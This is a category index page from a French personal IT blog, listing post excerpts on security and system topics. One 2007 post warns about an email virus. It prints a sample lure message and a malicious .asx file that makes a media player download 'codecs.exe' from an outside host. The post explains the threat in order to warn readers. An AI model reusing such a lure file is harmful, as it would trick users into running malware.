Thoms'blognote

Aller au contenu Aller au menu Aller à la recherche

Informatique

Fil des billets

mardi, décembre 30 2014

iBidules, applications offertes et comptes iTunes

Depuis septembre 2013, un certain nombre d'applications sont incluses gratuitement avec les devices Apple. Il est possible d'en profiter et d'en faire profiter d'autres une fois que l'on a compris le fonctionnement.

Lire la suite »

mercredi, juillet 27 2011

Nabaztag : the end of the road

As you may know, Mindscape has stopped servers hosting Nabaztag services due to financial difficulties the 27 of july 2011. For most Nabaztag this means death. However, some people are trying to create alternatives for the rabbits to survive.

You will find here some of them.

Lire la suite »

vendredi, novembre 12 2010

Firesheep : rien de nouveau, mais ca change tout...

Firesheep est une extension pour Firefox qui a été présentée lors d'une conférence sur la sécurité informatique le 24 octobre 2010 par Eric Butler et Ian Gallagher. Elle fait beaucoup de bruit car, sur un réseau wifi ouvert, elle permet potentiellement de prendre le contrôle de n'importe quelle session ouverte sur un site non sécurisé (non HTTPS). Cela semble être une révolution, une attitude irresponsable de la part des développeurs. En réalité, c'est plus subtile que cela et la démarche vise en fait le contraire de ce que l'on pourrait croire.

Lire la suite »

vendredi, avril 16 2010

Migration de contacts Exchange vers Gmail

Mon téléphone personnel est un iPhone et pour des raisons de commodité de gestion, mes contacts étaient synchronisés sur le serveur Exchange de ma société. Comme je change de travail, Il n'est possible d'utiliser le serveur Exchange de mon entreprise. J'ai donc décidé de migrer la gestion de mes contacts (ainsi que celle de mon calendier) sur mon compte Gmail.

Lire la suite »

mercredi, février 3 2010

Créer une Time Capsule avec Freenas

Depuis la version sa 0.7, Freenas permet de créer des partage pour Mac utilisable pour les sauvegardes avec Time Machine, le logiciel de sauvegarde intégré aux Macs. Ce billet explique comment créer une Timecapsule utilisable par Time Machine à l'aide de Freenas. Ce billet est un peu long, mais ne vous y fiez pas : il contient des informations pour comprendre et les différentes étapes sont détaillées. Les plus pressés pourront aller directement à la pratique.

Lire la suite »

mercredi, décembre 9 2009

Transformer un serveur web HTTP en serveur HTTPS sur debian

J'utilise une application de serveur météo installée sur une machine légère. Son développeur a choisi d'utiliser thttpd sur une plateforme Debian Etch. Ce serveur web est réputé pour sa légèreté et sa rapidité, mais ne supporte pas le HTTPS. Ce n'est pas que l'application soit critique, loin de là, mais le HTTP fait partie de ces protocoles historiques de l'Internet où tout circule en clair. Le danger, c'est que n'importe qui capable d'intercepter la communication en un point du réseau peut récupérer les codes d'accès. Comme l'installation représente une somme certaine de travail, je n'ai pas envie qu'un rigolo se prenant pour un [crack]hacker ne vienne casser l'installation. D'autre part, la mise en place d'un flux chiffré n'est pas difficile. Voici comment faire du HTTPS avec un serveur web qui ne l'intègre pas.

Lire la suite »

mardi, novembre 17 2009

Injection SQL : petite étude de cas

Suite à une actualité professionnelle récente, j'ai été amené à faire l'autopsie d'une attaque par injection SQL sur un serveur web. Cet article détaille le scénario de l'attaque et les techniques utilisées.

Lire la suite »

lundi, février 19 2007

Méthode d'infection virale d'un nouveau genre

Un nouveau mode de propagation de virus utilisant la messagerie est apparu récemment. Il se présente sous la forme d'un message texte relativement quelconque en français et d'une vidéo. Contrairement au méthodes habituelles d'infection, le virus ne transite pas par la messagerie. Le message n'est donc pas stoppé par les équipements habituels de sécurité.

En fait de vidéo, il s'agit d'un fichier .asx. Ces fichiers sont des fichiers de contrôles pour les lecteurs médias (Winmap, Windows Media Player, etc.). Dans ce fichier sont indiqué l'adresse de téléchargement de la vidéo et en cas de besoin l'adresse des codecs nécessaires à la lecture de la vidéo. Lorsque le lecteur télécharge et tente de lire la vidéo, bien entendu des codecs sont nécessaires pour la lecture de celle-ci. Le lecteur va donc interroger l'adresse renseignée dans le .asx pour récupérer les codecs. Or le fichier de codecs est un exécutable infecté par un virus. Le dernier rempart contre l'infection du poste est l'antivirus local (à jour) du poste.

un exemple :

From: "aaa@bbbb.com" <aaa@bbbb.com>
Subject: Anniversaire

C' est le film de mon anniversaire...
Peux tu reconnaître qui est a coté de moi?

Et le fichier vidéo.asx associé

<ASX version="3.0">
	<ENTRY>
		<TITLE>Codec not found</TITLE>
		<REF HREF ="http://updatecodecs.t35.com/video.avi"/>
		<DURATION VALUE="60:00"/>
		<BANNER HREF ="http://updatecodecs.t35.com/img_en.gif">
			<ABSTRACT>Download Codecs</ABSTRACT>
			<MOREINFO HREF ="http://updatecodecs.t35.com/codecs.exe" />
		</BANNER>
	</ENTRY>
</ASX>

Visiblement cet article a inspiré certains. Lisez la suite ici

samedi, avril 22 2006

Réceptionner des fichiers via IRDA sous Ubuntu

Voici une petite astuce pour réceptionner autant de fichiers que vous le voudrez via le port IrDa d'un portable utilisant la distribution linux Ubuntu. C'est particulièrement utile lorsque vous voulez envoyer plusieurs photo d'un téléphone par exemple. Elle s'adresse aux personnes qui ne sont pas familière avec programmation en shell.

Par défaut, le support de l'infrarouge n'est pas installé. Avant toute chose, vous devez donc installer le support de l'IrDa sur votre système Ubuntu. La démarche n'est pas bien compliqué. Tout est expliqué sur cette page : http://doc.ubuntu-fr.org/materiel/port_irda.

Une fois que l'IrDa est utilisable sur votre système, ouvrez un terminal et placez vous dans le répertoire de réception des fichiers. Puis tapez la commande suivante :

while(true); do ircp -r; done

Et voila, votre portable réceptionnera autant de fichiers que vous le voudrez. Une fois les transferts terminés, arrêtez le script avec la combinaison de touche CRTL + c. Les fichiers se trouvent dans le répertoire où vous avez lancé la commande.

Si ce billet vous a été utile, laissez moi un petit commentaire. Ca fait toujours plaisir :-)

jeudi, avril 20 2006

les rootkit et Microsoft

Depuis quelques mois, les utilisateurs des produits Microsoft découvrent une terrible menace : les rootkits. C'est quoi un rootkit? C'est une tentative subversive de déstabilisation des produits de la marque à la fenêtre par des barbus soixante-huitards défenseur de Linux.

Un peu de sérieux! Voyons ce qu'est réellement un rootkit et comment cela s'applique aux systèmes Microsoft.

Lire la suite »

vendredi, février 18 2005

Dans les entrailles du NTFS

Il existe dans le système de fichier utilisé par Windows un certain nombre de propriétés : le nom, la taille, etc. Des gens se sont aperçu qu'une d'entre-elles, assez peu documentée, offrait des possibilités inquiétantes : l'Alternate Data Stream.

Lire la suite »